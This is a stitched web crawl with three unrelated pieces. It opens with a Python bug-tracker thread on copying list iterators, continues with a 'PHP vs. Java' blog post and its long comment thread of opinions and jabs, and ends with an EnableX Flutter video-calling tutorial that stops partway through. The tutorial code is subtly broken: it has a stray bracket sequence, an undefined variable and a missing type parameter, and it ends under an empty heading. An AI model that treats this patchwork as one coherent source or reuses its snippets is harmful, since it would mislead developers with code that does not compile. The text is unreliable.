TypeError: object.__new__(list_iterator) is not safe, use list_iterator.__new__()
Pure python traceback. Just for clarity.
BTW, can we add support for copying iterators by using itertools.tee
Title corrected. Non-iterator iterables are usually easy to copy.
I think this is in the category of "don't do that" ;-)
I believe the idea of making iterators copyable has been rejected on one of the lists because it is probably not possible in general.
Tee consumes indefinite and unbounded space. Its use should be explicit. If a function needs to iterate more than once with an input iterable, it should explicitly do list(iterator) for iterator inputs.
See Raymond's comments, such as msg156720 in #14288.
So I suspect that raising an error for copy.copy(iter([])) is correct. The error message amounts to saying make a new instance with the class constructor. That is usually correct when copy is not possible, but not in this case. ListIterator.__new__ is the inherited object.__new__. It appears that ListIterators can only be constructed by list.__iter__. But I doubt that the code that raises the error message can know that.
But perhaps the error message can be improved anyway.
Before anyone else rushes of to do this, can I? I really want to break into python-dev and this might be my chance.
Please, give it a try. But also be prepared for it being harder than it looks; the problem is that there may be very limited knowledge available where the error is generated. (I don't know; I haven't looked at the code and am not likely to...I usually leave reviews of C code to our C experts.)
Actually the tp_new field of list iterator class is NULL. Unpickler raises other error in such case (see issue24900 for example).
UnpicklingError: NEWOBJ class argument has NULL tp_new
Backported to 2.7 the part of the patch for issue22995 fixes this issue.
>>> copy.copy(iter([]))
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/serhiy/py/cpython-2.7/Lib/copy.py", line 88, in copy
rv = reductor(2)
TypeError: can't pickle listiterator objects | https://bugs.python.org/issue14350 | CC-MAIN-2020-50 | refinedweb | 786 | 61.22 |
PHP vs. Java - which is better? I have a former client that has a customer. This customer asked them - "so when are you migrating from Java to PHP?" So evidently this person has the impression that the next wave of web applications will be written in PHP. My former client has asked me to provide an answer for their customer. If I translate it, I think they mean to ask "what is different between Java and PHP and why should we use Java over PHP." Here are my opinions - please add yours as you see fit. I must admit I don't know a whole lot about PHP, except that it's widely popular among the Linux/Apache/MySQL crowd and that it's similar to ASP in it's lack of a MVC architecture (yes, I know about the PHP MVC project).
- I think Java is more of an industry standard, whereas PHP seems to be popular among hackers and hobbyists.
- Java provides better separation of layers - key for testability. PHP has all the code embedded in the page, so you have to run it through a browser to test if database connections work (for instance).
- Java is more scalable.
- More folks know Java and it's easier to qualify someone's Java skills. How do you test someone knows PHP? Is there a certification?
- More for-profit organizations use it.
If you're a Java or a PHP-lover, I'd love to hear your opionions (facts are always better). I'm going to point my client to this post, so keep it clean.
Posted in Java
at Aug 22 2003, 03:52:33 PM MDT
97 Layton on August 22, 2003 at 05:23 PM MDT #
Posted by Damien Bonvillain on August 22, 2003 at 05:44 PM MDT #
Posted by Chris Davies on August 22, 2003 at 06:50 PM MDT #
Posted by rich! on August 22, 2003 at 07:15 PM MDT #
I do agree that Java provides for a much greater seperation of layers, although there are some neat templating systems for PHP (Smarty, for example). JSP with taglibs is OK, but Struts/Webwork/etc/etc provide fantastic architectural support. Even with extensive use of PHP's object model, you are still tied to scripts (which you can include and reuse, but it gets messy reasonably quickly). With proper seperation, testing in Java is a breeze. I use Webwork, and I can test Actions with JUnit directly from Eclipse. I test my data tier directly as well. I can't see how you can test PHP outside of the server environment (unless you move to command-line PHP interpreter?)
Scalability is a whole other f*cking can of worms. Yahoo selected PHP for their systems, other companies use Java (parts of eBay, Dell). Any system (within reason) can be made to scale ... I have scaled ASP/VBscript on IIS. Get some routers, buy a bunch of web servers and the biggest database you can afford.
Testing developer skils is a challenge regardless of the language. Certification is no real indication of expertise, just an indication of passing an exam (and keep in mind that if you get 50% and pass, it is also another way of saying that you know HALF of the subject material) . I cannot comment on the numbers of developers, but in my experience finding quality Java people can be a challenge (finding people who have touched Java is easier).
Personally I think that language is just one of the many factors that need to be considered when desiging a system, and they should be subsidiary to the business case.
Posted by Toby Hede on August 22, 2003 at 07:25 PM MDT #
Posted by No one on August 22, 2003 at 08:02 PM MDT #
Toby and "No one" are both correct. One of the things that "No one" missed was that the install base of PHP on webhosts is HUGE. Far greater than Java. I would like to add a couple of things that I have noticed from my experience with PHP and Java. I currently have two deployed PHP web applications that I have to maintain. I also have three java web application that I maintain.
PHP is such a head-ache that I would NEVER suggest to a client that a web application be written in PHP. "No one" is correct about installation. If you don't have PHP installed with Apache, you are in for a long ride. Nothing can beat the installation of Orion. Unzip. java -jar orion.jar. Instant Java Web App.
Database access has not been standardized. Every database has its own set of functions, and they are not always named or perform the same type of functions. Oracle's functions are so different it boggles the mind.
PHP has OOP, but it is not like any other OOP I have ever used.
PHP's XML support is antiquated. No JDOM for PHP.
PHP is a mish-mash of functions that have been thrown together in one library without any care given to convention or standards. Just check out the number of functions that have been written for arrays: Array Functions and notice that some begin with array_ and some don't. Session handling in PHP is a real pain as well.
PHP does have a couple of pluses. It is easy to learn. The documentation is good and in one place. There are a bazillion scripts that are already written. There are a bazillion web hosts that already have it installed.
Can things be done "correctly" in PHP? Yes. But once your developers learn how to do things correctly, they will be asking for Java. When they overload a function, they will not want to count the number of parameters that were passed to determine which function should actually be called. They will tire of trying to avoid the circular includes. They will tire of the constant ftp to the server to test out the latest changes. And they will want a real IDE.
I suggest using PHP to learn the fundamentals of web based applications. Use Java to actually build systems.
Here is an article discussing why a largish hardware site switched from PHP to Java. It disusses the virtues and vices of Multithreaded (Java) and Multiprocess (Apache/PHP) systems.
Posted by Carl Fyffe on August 22, 2003 at 08:55 PM MDT #
Posted by Marc Adams on August 23, 2003 at 09:49 AM MDT #
Posted by Ale Sarco on August 23, 2003 at 03:08 PM MDT #
Posted by Joshua Hoover on August 23, 2003 at 10:29 PM MDT #
Posted by csshsh on August 24, 2003 at 10:38 AM MDT #
You can isolate a class of web "applications" where you feel that Java is overkill, PHP fits this niche.
Posted by Damien Bonvillain on August 24, 2003 at 02:51 PM MDT #
Posted by Adam Vandenberg on August 25, 2003 at 01:42 PM MDT #
Posted by Olivier Rossel on August 26, 2003 at 07:09 AM MDT #
Posted by Damien Bonvillain on August 26, 2003 at 04:14 PM MDT #
Posted by Paul Rivers on August 29, 2003 at 07:30 PM MDT #
Posted by Dianne Schoenberg on August 30, 2003 at 07:23 PM MDT #
Posted by Dhananjay Nene on September 03, 2003 at 01:49 PM MDT #
Posted by Oliver Tseng on September 12, 2003 at 09:27 AM MDT #
Posted by Michael on October 28, 2003 at 09:14 AM MST #
Posted by bubba on March 24, 2004 at 11:11 PM MST #
Posted by kok koon leong on May 06, 2004 at 11:35 PM MDT #
It addresses many of your gripes about PHP in respect to Java. that leaves you with a very rapid development language and still logical code-reuse and seperation of layers.
It also have a component event cycle similar to .NET which provides a very simple suggested coding standard.
-Jackson
Posted by Jackson on July 16, 2004 at 03:14 PM MDT #
Posted by Nick Parca on September 29, 2004 at 01:04 PM MDT #
My primary focus includes scalability, true object orientation and performance. Other factors: We are currently all MySQL but want to migrate to Oracle, we see anywhere from 30-80K surfers per day depending on the season, and I must create an upgrade path that blends in with the existing system - I will not have the luxury of a "Next Release Cutover" scenario. All communication is performed between systems via HTTP with XML as the interaction language - that being said, I still need to communicate with a variety of other systems using and equally wide variety of protocols (merchant processing, currency conversion, GeoIP et al...). There are no proprietary forms/apps/methods that talk to the system, everything is done via HTML. As an aside, I would REALLY not like to go to two languages, provided I can do this without breaking my "Best tool for the job" ethos. Any coder worth his/her salt can learn a language/framework given some space, so the ramp up time is considerably less important than the result (Frankly, I think the zealotry in several previous posts demonstrates more about one-trick-pony coders than architecture and framework effectiveness).
My immediate experience is that a Tomcat/JBoss deployment has a bunch of overhead that seems to be less than exciting from a performance perspective, but I am concerned about PHP systems not being built from a class hierarichy (I love the Delphi model where everything decends from TObject...). I would really enjoy seeing both a Java and PHP expert argue why I should go with their platform. Clearly, Yahoo and Friendster think that PHP is the way to go, but the list of J2EE folks is getting huge.
Thanks for the space,
-EP</font>
Posted by Ed Purkiss on December 09, 2004 at 11:39 AM MST #
I think you can equaly use php an java for the same purposes. You can create extensive applications with both php and java. The whole problem is the reputation of php. Sure there are things you can't do with php and surely that works two way's
Currently i am developing a php framework in php5 that is completely class based and communicates only using xml. Php CAN be used to make very clean, reusable and maintainable software BUT the level of dicipline needed to do that is WAY higher than needed when useing java. The rules you must set for oneself are harsh and you must abide by them strictly otherwise your php app wil degrade very fast into a bunch of scripts that are not very usefull.
Posted by Quinn on December 16, 2004 at 08:39 AM MST #
Posted by Michael Clayton on January 25, 2005 at 04:34 PM MST #
I'd like to comment on Permalink's original article:
>>I think Java is more of an industry standard, whereas PHP seems to be popular among hackers and hobbyists.
This is not a reason to do anything. Don't do stuff because others are doing it, that's for lambs. Do what you must. In fact, choosing technology X when your competition is using technology Y might be a competitive advantage (or it may be a fatal flaw - depends on what are you choosing over what).
>>Java provides better separation of layers - key for testability. PHP has all the code embedded in the page, so you have to run it through a browser to test if database connections work (for instance).
True to some extent, but that depends more on how do you design your PHP-powered system. If, for example, you keep all your database abstraction layer separate, you can test separately.
You can also use Smarty or other template systems to completely separate code from display, so you can have programmers write PHP code and web designers write HTML/CSS, change look or behavior separately, etc.
>>Java is more scalable.
Not true. Java applications tend to be state-based. PHP applications are stateless. It's far easier and cheaper to set an array of very cheap (even second-hand!) PCs running Linux+PHP, than Java clusters. PHP is scalable right-away, you don't have to design your applications to be so!
>>More folks know Java and it's easier to qualify someone's Java skills. How do you test someone knows PHP? Is there a certification?
There are PHP certifications, check out Zend's website. Java is, indeed, more widely known (although this is changing), but PHP is ridiculously easy to learn as opposite to Java. Besides, any Perl programmer will have it very easy to learn PHP, and Java/C/C++/C-like language programmers already know the syntax.
>>More for-profit organizations use it.
See my first comment.
IMO, Java will be better (and perform better) for very large applications, but elsewhere, I wouldn't doubt using PHP, for the following reasons:
1. It's far more productive than Java, and I mean far more. What it takes 10 hours to develop in Java, you can easily do in 1 hour in PHP. Time is money. This alone makes me like one language over another.
2. It follows the KISS principle, as opposite to Java which tends to produce bloatware and blOOatware.
3. This is part of the reason for points 1 and 2, but it deserves special mention: the PHP APIs are simple and productive, unlike Java's blOOated, cumbersome, needlessly complicated APIs. It's so overgeneralized you can't do anything quickly. It pretends to solve so many problems it doesn't solve anything easily. You can't possibly memorize all that and be productive with it. Think parsing a URL. In Java you have to create a new object and call methods with illogical names to do it. In PHP, all you have to do is call ONE function - parse_url - then simply access whavever you want as a hash, using the names you actually know and use everywhere, like port or host.
4. It's cheaper. Any cheap Celeron with 100% free software will be a great PHP server for a site/web application with tens of thousands of hits a day! As you need more power, scalability will be cheaper and simpler too - but there are few things a dual Xeon with PHP won't take! PHP can be ridiculously fast for small to medium-large applications in real environments.
Posted by Wiseman on May 15, 2005 at 09:22 AM MDT #
Posted by liam on July 20, 2005 at 08:34 AM MDT #
Posted by Labros on May 02, 2006 at 07:42 PM MDT #
PHP is pretty damned easy to install.
1. Install Apache
2. Install PHP with the windows installer
3. Add PHP's apache configuration lines. All 3 of them.
4. Restart apache.
Database access is now standardish. You have PDO (PHP Data Objects), PEAR::DB, and Zend_DB. Any of these options allow you to connect to any kind of database and go.
PHP has OOP. PHP doesn't (yet) have namespaces. It fits very well, barring that.
PHP now has SimpleXML. XML in PHP is easy.
A few other of Carl Fyffe's comments niggle me.
> They will tire of trying to avoid the circular includes.
PHP has had require_once, include_once forever. If you don't know about those, you haven't RTFM.
> They will tire of the constant ftp to the server to test out the latest changes.
It's too hard to set up your own apache + php installation? Four steps!
> And they will want a real IDE.
Maybe. I can't stand the damned things. My coworkers all use Zend Studio, and it's alright. The only thing it gives you is the ability to tab complete, and shorthand code completion. The rest... well the rest can be done with a decent text editor and a collection of command line applications. PHPUnit, ZendCodeAnalyzer. Doxygen.
The beauty of not using an IDE means you stay focused, your functions/classes/methods HAVE to be easy to remember and make sense, and if you don't KISS you dig your own grave. PHP used like that results in a very handy tool.
Posted by Daniel O'Connor on August 24, 2006 at 01:05 AM MDT #
Posted by someone on October 20, 2006 at 03:11 PM MDT #
Posted by DHIRAJ PATRA on November 30, 2006 at 03:21 AM MST #
Posted by david on December 03, 2006 at 02:44 AM MST #
I think Java and PHP are for different things. I have been a Java programmer since 1997. I do coding on my job and make a living with it. Recently, I wanted to create a website for kids' math, I couldn't find a good open source java package for it. I searched on the web and found there are many good open source PHP packages there that may be good for the purpose.
I spent a month (a couple of hours each day) on creating with Drupal. I think Drupal is well suited for the job. I don't believe I could do it in Java.
Java may be just for so-called enterprise applications -- companies hire high paid Java programmer for their good or bad systems.
Posted by Paul Z. Wu on December 04, 2006 at 01:34 PM MST #
Posted by kiran on January 09, 2007 at 06:00 AM MST #
Posted by Man'z on January 16, 2007 at 02:08 AM MST #
Posted by MG on February 05, 2007 at 11:07 PM MST #
Posted by me on May 24, 2007 at 07:13 AM MDT #
Posted by peter_kosmas on September 04, 2007 at 07:11 AM MDT #
Posted by Lox on September 12, 2007 at 06:44 AM MDT #
Posted by bluejay on September 18, 2007 at 04:24 AM MDT #
Posted by Amir Ali Tayyab on October 10, 2007 at 02:24 AM MDT #
Posted by Madis on October 16, 2007 at 09:58 AM MDT #
Posted by David Hill on October 25, 2007 at 11:59 PM MDT #
Posted by Iwan on November 04, 2007 at 03:58 PM MST #
I'm migrating from J2EE to PHP, I think PHP is:
- more scalable;
- more simpler and fast;
- fast to develop;
The customers always ask to make a site with good performances, and java is not the right choice.
Posted by mike on January 22, 2008 at 04:20 AM MST #
The truth is: many people using php don't have any clue about java and many people using Java don't have any clue about php but both are quite the same in a web context with a few things that make them more liked in different situations.
I personally believe as i'm a php guy that php is a much better choice for any web app/site needs, just because it has been a great part of my experiences while the few experiences i had with java were about highend big company webapps built in the early 2k. I'll try to say a few things about what i know better, wich is php:
-php isn't a pure oo language, wich imo is the main reason why many php apps are faster than any java concurent (because java object model and framework is so rich that it's just oversized as a response to web's small needs)
-php let the developpers do as much mistake and design errors as they want. This is actually a big advantage because it also means it's easier to learn for the beginners and that doesn't means that an experienced developper will engineer a bad an lacking performance or maintenability code.
-php offers a response to most of the needs one can have. Including offline and asynchronous tasks and permanent session (that would be with some work done with the operating system but still it's not a really hard thing to obtain) as i see it those 2 are the main reasons for an enterprise to go the java way in a web based application.
-php is widely available and used over the web, much more than java and increasing, there isn't much more to say here that's just a fact with natural consequences to expect.
Now as i see it, java has been created to handle domotic needs in the first place and still is a common used language in many industrial companies, like cars etc, that isn't imo a domain php is suited for, even for traditional heavy client market java is much more used than php will probably ever be. Php has a big advantage on the web mostly as it is used in apache as a module zeroing any VM launch time, but in any other context Java and php both take time to run comparing to any compiled program, as far as i'm concerned i see no problem saying java is better than php when it comes to anything but web things, i could mention tho, that there is a lot better than java there with C++ or C but that is another troll i guess :)
Posted by 41.208.139.136 on January 22, 2008 at 10:58 AM MST #
As you said...
* "I think Java is more of an industry standard, whereas PHP seems to be popular among hackers and hobbyists."
-- I believe Java is more popular among the industry who can afford high bucks. While PHP - Powerful Hyper Text Processor in my opinion is most popular among web-applications.
I personally used both Java and PHP for same web-application and found PHP processing the data much faster than anything else in near-by competitors.
Regarding security, I do not think anything Java, ASP or PHP can secure 100%, once door to internet gets open while connecting to World Wide Web. When no one can guarantee 100% security or bug-free version, why not to go for an open-source.
* "Java provides better separation of layers - key for testability. PHP has all the code embedded in the page, so you have to run it through a browser to test if database connections work (for instance)."
-- Not necessary, PHP codes do not require to embedded in the web-page. As PHP has choice between include() and require() function.
* "Java is more scalable."
-- Personally, I could not find anything PHP can not do that Java can do. But, as a matter of fact I could not found any Java based online shopping-cart application which is fast and popular.
* "More folks know Java and it's easier to qualify someone's Java skills. How do you test someone knows PHP? Is there a certification?"
-- PHP runs on Zend Engine, Zend offers PHP certification and Zend is founded by Zeev Suraski, Andy Gutman and Rasmus Lerdorf who invented the PHP.
* More for-profit organizations use it.
-- If we look at the statistics provided by third party, PHP installations on web-server keep increasing day by day because of more than one factor. The one factor is easy to learn. Syntax is very similar to C++ and Java programming. Plus it's really fast interpreted language.
Posted by SID TRIVEDI on February 10, 2008 at 11:42 PM MST #
Posted by rajeev on March 03, 2008 at 04:16 AM MST #
Posted by Ben on March 12, 2008 at 06:44 AM MDT #
Posted by prabhat on March 31, 2008 at 05:38 AM MDT #
Posted by maharba on April 01, 2008 at 07:07 PM MDT #
Posted by random on April 24, 2008 at 02:43 PM MDT #
Posted by Manju chauhan on May 14, 2008 at 02:36 AM MDT #
Posted by Manju chauhan on May 14, 2008 at 02:37 AM MDT #
Posted by Manju chauhan on May 14, 2008 at 02:37 AM MDT #
Lots of *very* insightful comments. I will now add my own:
I drank too much Java. Now I have to PHP.
Goodbye, you self-serious clods!
Posted by all i know on May 23, 2008 at 02:30 PM MDT #
Posted by Extenders on August 11, 2008 at 01:25 AM MDT #
Posted by Bob on August 12, 2008 at 08:59 AM MDT #
Posted by raj on August 17, 2008 at 11:18 AM MDT #
Posted by raj on August 17, 2008 at 11:19 AM MDT #
Posted by raj on August 17, 2008 at 11:20 AM MDT #
Posted by raj on August 17, 2008 at 11:31 AM MDT #
Posted by adwin wijaya on September 17, 2008 at 05:12 AM MDT #
Posted by adwin wijaya on September 17, 2008 at 05:15 AM MDT #
Posted by Nehatha on October 16, 2008 at 04:30 AM MDT #
PHP programmers are by far the worst programmers of all. No other programmers have the capacity to produce gazillions of terribly mediocre script as PHP programmers do.
Fact2:
PHP is easy to learn. That's its streagth and in there lies its weakness too. Because every hippy with a notepad can write php code and get instant gratification of being able to echo out HELLO WORLD in a minute or so.
IT also means these same hippies are the ones who after writing few extra lines of code consider themselves programmers and start up their own blogs to share their knowledge of PHP via tutorials and scripts and litter the internet with criminally mediocre code.
There's nothing terrible than seeing a whlole page being bulit with PHP ECHO statements.
eg. echo "<HTML><HEAD>.......". And that's exactly what hippies do when they realise they can use PHP to actually output html too. U see, hippies are not aware of the benifit of separating applications into layers for managebility, maintainability and flexibility. Hippies do live in their own world u see....
Fact 3:
Zend framework is crap. there I said it.... And it comes out of a company run by the inventors of PHP. Though I tried so many times, I just can't seem to bring myself to use it....
Fact 4:
In fact pretty much all PHP frameworks are crap.
Fact 5:
Pretty much every JAVA frameworks suck too. :-)
Fact 6:
All the improvements that gets put in new releases of PHP is just a catch-up game with JAVA.
Fact 7:
Any language that doesn't have native support for namespace is a language for amateurs :-)
Fact 8:
PHP can't do everything java can, not by a long shot. Multithreading ?? hello! Try writing an applet :-)
Fact 9:
I like Java and I like PHP too. But if someone tries to tell me PHP is better than java or PHP is inpar with java , I always beg to differ. Its like comparing a bicycle with a car..... not quite but close :-)
Fact 10:
Netbeans has released a FREE IDE for PHP. Its got all great features like code completion, syntax highlighting, marking of occurrences, refactoring, code templates, pop-up documentation, easy code navigation, editor warnings, a task list, as well as a debugger. F
Fact 11:
Netbeans is a product of Sun Micro Systems. Yes, hippies, that's right, they are the folks that gave you java and now they are trying to turn hippie PHP programmers into real programmers by providing a productivity tool with a standard project structure and heaps of goodies to make PHP software development so much better.
Fact 12:
Zend IDE from the hippies that brought us PHP is a commercial tool. and even then it sucks big time. I haven't even started on the commercial Accelerator that Zend provides to speed things up in PHP, and why greed is a bad thing for hippies and why such greed only harms the cause og PHP as a language.
Fact 13:
FACT 11 & 12 point to the fact that java community is making a greater contriution to PHP than hippies that run Zend.
Fact 14:
Netbeans PHP IDE is the best thing to happen to PHP programmers after sliced-bread.
Fact 15:
If you don't like Netbeans PHP IDE, u r a hippie!
Fact 16:
: I have to admit , I like PHP too. I program in both languages and I can switch languages with equal ease. Not just that I use combination of both sometimes to get things done. And both java n php programmers might find it horrifying but I like JavaScript too. I like to write language agnostic web applications. I use a lot of javascript and good database domain model. If you have a rich set of javascript library and a well designed database model, server-side language merely acts as a service layer.....and I can throw away PHP and use java when I need java's power and flexibility, without rewriting my whole application.
Posted by anjan on October 21, 2008 at 08:42 PM MDT #
Posted by Gabriel on November 06, 2008 at 01:02 PM MST #
Posted by anjan on November 13, 2008 at 06:36 PM MST #
Thanks to all of you for your contributions (except for the very few that are obviously jerks).
Java vs PHP is a debate that is here to stay, the reason I am looking at this page is that I got sucked in to a large Java project and I have found it absolutely incredibly hard to do stuff that in php is quite simple. mysql_fetch_array in php for instance, vs no such thing in java, unless I've been looking in all the wrong places.
I've done a lot of programming, from assembler to C, php, basic and a whole slew of other languages but I do not remember anything quite as 'verbose' as Java code, it looks like classes are endlessly repeating chunks of code that are handled quite easily by utility functions in other languages but which are either not present in java or nearly impossible to implement. Portability seems to be another issue, switching from 'resin' to 'tomcat' caused all kinds of build issues, changing a single class and redistributing it requires a server shutdown and so on.
I'm sure I'm still doing lots of stuff 'wrong' from the java point of view but I have a feeling that PHP has improved a lot in the last few years whereas java has more or less stood still when it comes to doing web development.
I'll keep revisiting this thread from time to time to see what else comes up, it sure has been an interesting read.
And now back to java coding :(
j.
Posted by Jacques Mattheij on December 28, 2008 at 05:03 PM MST #
Posted by Cifar24 on January 25, 2009 at 02:45 PM MST #
I purely agree that PHP will be the language of next gen for web development. I've been a hard core java developer for years but now i'm designing a site for which i had to learn php. After building few pages with php i've seen there z a lot of reduction in development time compared to that of java and php is faster than java at times.(NO vm required for php)
In terms of scalability php scales more than java. (Read it in a recent study article published by the architect of XML and co-founder of OpenText). Java is next to php in scaling, but yes maintaining php files is a bit confusing than java packages. Until or unless you aren't developing web apps for a company which has its own dedicated server and own resources i would preferably say php will be a better choice.
Posted by Kailashnath on February 16, 2009 at 02:36 AM MST #
Posted by Raja S Patil on April 17, 2009 at 03:13 AM MDT #
Posted by Ryan on April 19, 2009 at 08:48 AM MDT #
Posted by Ryan on April 19, 2009 at 08:49 AM MDT #
Posted by Ryan on April 19, 2009 at 08:51 AM MDT #
It is possible. Java have the syntax to do that.
-- Also, it's fast to develop in. Whereas in J2EE, you'd have to compile, deploy, wait for JSP to compile (if you didn't precompile them beforehand) and then you can test it
-- It took me some time to figure out how to use servlets and jsp but only a few minutes to hack out a php script.
If you compare just PHP script with JSP script, then the learning curve and will just be the same. And with the extension lib from Apache Commons Lib, it will be as easy to use JSP as PHP.
-- Java has a slow start up and requires more from the client's computer, as php is server side only and gives client a maximum ease of access
Hi, I think you miss the point. Both J2EE and PHP are use as a server side programming and sends only client side codes like html and javascript to browser. Most people here did not mention Java applet as it is mostly use as a heavy client purpose.
-- php isn't a pure oo language, wich imo is the main reason why many php apps are faster than any java
Sounds logical. But does that means anyone who use OO in PHP5 will experience slower response that is comparable to Java?
Posted by Ryan on April 19, 2009 at 08:53 AM MDT #
Posted by pankaj on April 20, 2009 at 03:04 AM MDT #
Posted by Shah on May 30, 2009 at 09:49 AM MDT #
Posted by Shah on May 30, 2009 at 09:50 AM MDT #
Posted by Shah on May 30, 2009 at 09:51 AM MDT #
Posted by Tadas on November 30, 2009 at 10:56 AM MST #
Posted by kirk bushell on March 18, 2010 at 06:50 PM MDT #
Posted by rakesh on April 19, 2010 at 09:50 PM MDT #
Posted by Ali on April 23, 2010 at 04:30 PM MDT #
Posted by Ali on April 23, 2010 at 04:31 PM MDT #
Posted by Ivan Ganev on May 03, 2010 at 02:06 AM MDT #
How you can compare the Hypertext Preprocessor with a compiled language ? So your next comparison should be: JavaScript versus C++! which one is better for web apps?
So the Java is to develop any cross platform application. The PHP is to develop websites.
Yes, you can do websites using JAVA as you can walk on the beach wearing ski boots :)
I worked for one big company for 6 months so I'd say: that company is developing lot of webapps or websites and all of them using JAVA,why? because they can hide the code against customer, even the client can decompile the app cannot re-use simple way. And as far I remember it was painful for us and almost everyone asked: why not in PHP?
The funniest was: the company website was written in PHP ;)
Posted by daniel on May 07, 2010 at 04:52 AM MDT #
Posted by Matt Raible on May 07, 2010 at 10:28 AM MDT #
Posted by Yogesh on June 13, 2010 at 11:00 PM MDT #
Posted by Anirudha on August 19, 2010 at 06:02 AM MDT #
Posted by Anirudha on August 19, 2010 at 06:02 AM MDT #
Great comments, its pretty easy to identify the PHP'ers who don't really have the capacity to understand true application requirements.. And you Java guys who hav't really used PHP commercially, just glossed over the feature list, you ain't much better comparing the two.
But I can honestly say I'm qualified to make a point. 10+ years exp biulding internet apps of ALL types, started with PHP4 back in the day, built many an app, and administration system (50+). PHP was fine while the job was small.
Then evolved into Java which is now the bread and butter. Built real apps, multi-tiered, distributed, cached to the shit for some of the bigger brands in the country. And it is the shit.. if the client wants it, it can be done in Java.
But I'm not gona pointlessly highlight pro's and con's of each. They're both bloody good at what they do, which is why so many of you are red-faced defending your babies... as you should.
However the question is, which do you recommend to the client?
Well... the answer is... WHAT ENGINE OF CLIENT DO YOU HAVE?
Both will do the job, BUT, if your client is a notorious tight arse who bitches and moans with every cent they spend irrelevant of the bigger picture, and the job isn't massive, go with PHP. You'll be able to get dev's, and if they are half descent occasionally will deliver on the promises they gave with naive arrogance.
But if the client is willing to invest, has realistic expectations, has priorities squarely focused on long term goals, and has hopes to build on their investment over time, go with Java. By commiting to Java you're generally agreeing to a more structured approach, not just in code (which for a few of you clearly still think is all that matters), but also a more structured build process, with some sort of actual methodology, architectural consideration and design phase, documented requirements and signoff points.
And the end of the day the client needs some sort of assurance before the nerds start bashing out code, whatever language they choose. So make sure whoever you hire is not the sort of amature that spends all day on forums blindly defending the only programming language they know!
Posted by ExperiencedDude on September 01, 2010 at 09:42 PM MDT #
Posted by OneComment on November 11, 2010 at 10:14 AM MST #
HipHop for PHP transforms PHP source code into highly optimized C++. It was developed by Facebook and was released as open source in early 2010..
Facebook sees about a 50% reduction in CPU usage when serving equal amounts of Web traffic when compared to Apache and PHP. Facebook’s API tier can serve twice the traffic using 30% less CPU.
Posted by 121.97.136.228 on April 22, 2011 at 08:12 AM MDT #
i would suggest you to check following pdf for your answer
Posted by mack on April 11, 2012 at 06:59 AM MDT # | http://raibledesigns.com/rd/entry/php_vs_java_which_is | crawl-003 | refinedweb | 6,447 | 67.79 |
Building an engaging video calling app can be simple if you build it on a secure and robust communication platform such as EnableX . In this tutorial, you’ll learn how to add group calling function to your Flutter app.
Prerequisites
Before we start, let’s make sure we have the following in your development environment:
For IOS
Flutter 2.0.0 or later
macOS
Xcode (Latest version recommended)
Note: You need an iOS device
For Android
Flutter 2.0.0 or later
macOS or Windows
Android Studio (Latest version recommended)
Note : You can either use Android simulator or an Android device
Cautions
Please run flutter doctor to check if the development environment and the deployment environment are correct.
Get an EnableX Account
Please sign up for an account with us. Its absolutely free! Once done, create a Project and get the necessary credentials and you are ready to start!
*Create a project
*Get App ID and App Key. Please refer here on how to get the ID and Key
In order not to get you confused, you might be interested to know some of the common acronyms we used.
EnxRTC-This Class features a versatile method for developers to connect to a room and successfully publish a stream into it. To start using EnableX, an Object must be created using EnxRtc Constructor.
EnxRoom-The EnxRoom is a derived Class from EnxRtc. It handles all room related functions to communicate with EnableX, e.g. Connection of End-Points to EnableX Room, publishing & subscribing of streams etc.
EnxStream -The EnxStream is a derived Class from EnxRtc. It handles all Media Stream related functions to initiate, configure and to transport streams to EnableX Media Servers. It is also used for receiving stream end-points to be played.
EnxPlayerView: It use to display the video stream on a EnxPlayerview.
Let’s Get Started
Create A Flutter Project
Now that we have all things set up, you are ready to build a group video calling app. First, you need to start creating a new Flutter project
You may use Visual Studio Code to create a Flutter project. Do install the Flutter plugin in Visual Studio Code. See Set up an editor. Once done, please follow the steps below:
- Select the Flutter: New Project command in View > Command. Enter the project name and press .
- Select the location of the project in the pop-up window. Visual Studio Code automatically generates a simple project.
Alternatively, you may also use Android Studio to create a Flutter project. Do install the Flutter plugin in Android Studio. See Set up an editor. Once done, please follow the step below
- Click on file Select the New -> New Flutter Project ->Flutter Application
Add Dependencies
Now, pls add the following dependencies in pubspec.yaml based on the following steps:
- Add the enx_flutter_plugin dependency to integrate EnableX Flutter SDK.
See for the latest version of enx_flutter_plugin.
environment: sdk: >=2.7.0<3.0.0 dependencies: flutter: sdk: flutter# The following adds the Cupertino Icons font to your application. # Use with the CupertinoIcons class for iOS style icons. cupertino_icons: ^0.1.3 # Please use the latest version of enx_flutter_plugin enx_flutter_plugin: ^1.8.0 permission_handler: ^3.0.0
Install it – You can install packages from the command line:with Flutter:
$ flutter pub get
Alternatively, your editor might support flutter pub get.
Check the docs from your editor to learn more.
Generate Access Token
Every user is required to use an Access Token, uniquely to them, to connect to a room. This step is usually done by Rest API’s Call.
Do use the following link to create token and roomId
Get Device Permission
EnableX Video SDK requires camera and microphone permission to start a video call. Simply follow the following steps to create device permission.
Android" />
IOS
Open the info.plist and add:
Privacy – Microphone Usage Description, and a note in the Value column.
Privacy – Camera Usage Description, and a note in the Value column.
Note
Your application will be able to have a voice call if the Background Mode is enabled. To enable Background Mode, simply following the following steps:
Select the app target in Xcode,
Click the Capabilities tab to enable Background Modes, and check on Audio, AirPlay, and Picture in Picture.
Handle Errors
IOS Black Screen
Our SDK use PlatformView, you should set io.flutter.embedded_views_preview to YES in your info.plist
Start Video Calling
We are almost there! Now that we have all the setup and permission handling done, let’s declare some variables needed to manage the state of the call
Import Packages
import 'package:enx_flutter_plugin/enx_flutter_plugin.dart'; import 'package:flutter/material.dart'; import 'package:permission_handler/permission_handler.dart';
Define VideoConferenceScreen Class
class VideoConferenceScreen extends StatefulWidget { @override _VideoConferenceScreenState createState() => _VideoConferenceScreenState(); }
Define App States
class _VideoConferenceScreenState extends State { static String token = ""; @override void initState() { super.initState(); initPlatformState(); initEnxRtc(); } // Initialize the permission handler Future initPlatformState() async { // Get microphone permission await PermissionHandler().requestPermissions( [PermissionGroup.microphone, PermissionGroup.camera,],], ); }
//initialize ENXRTC
Future initEnxRtc() async { Map<String, dynamic> map1 = { 'audio': true, 'video': true, 'data': true, 'framerate': 30, 'maxVideoBW': 1500, 'minVideoBW': 150, 'audioMuted': false, 'videoMuted': false, 'name': 'flutter', 'videoSize': map2 }; await EnxRtc.joinRoom(widget.token, map1, null, null); }
//Add ENXRC Handler Callbacks
